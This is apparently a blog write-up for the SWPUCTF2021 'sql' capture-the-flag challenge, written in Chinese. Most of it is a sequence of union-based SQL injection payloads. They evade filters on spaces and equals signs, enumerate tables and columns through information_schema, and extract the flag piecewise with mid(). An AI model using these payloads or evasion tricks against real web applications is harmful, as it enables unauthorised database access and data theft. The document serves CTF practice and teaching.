SWPUCTF2021-sql-wp

题目链接

# 空格和等号都被过滤 
# 空格替换为 /**/
# 等号替换为 like

# 查看列数、数据库名
?wllm=-1'order/**/by/**/3%23
?wllm=-1'union/**/select/**/1,2,database()%23  

# 查看表名发现有LTLT_flag
?wllm=-1'union/**/select/**/1,2,group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema/**/'test_db'%23  

# 查看LTLT_flag中列名发现有flag
?wllm=-1'union/**/select/**/1,2,group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name/**/like/**/'LTLT_flag'%23  

# 查看flag 但是发现有长度截取
?wllm=-1'union/**/select/**/1,2,group_concat(flag)/**/from/**/test_db.LTLT_flag%23  

# substr substring right reverse都被屏蔽  发现mid可用（相当于substr）  一组组获取flag
?wllm=-1'union/**/select/**/1,2,mid(group_concat(flag),1,20)/**/from/**/test_db.LTLT_flag%23

本博客采用知识共享署名-非商业性使用-相同方式共享 4.0 国际许可协议(CC BY-NC-SA 4.0) 发布.

Prev Home Next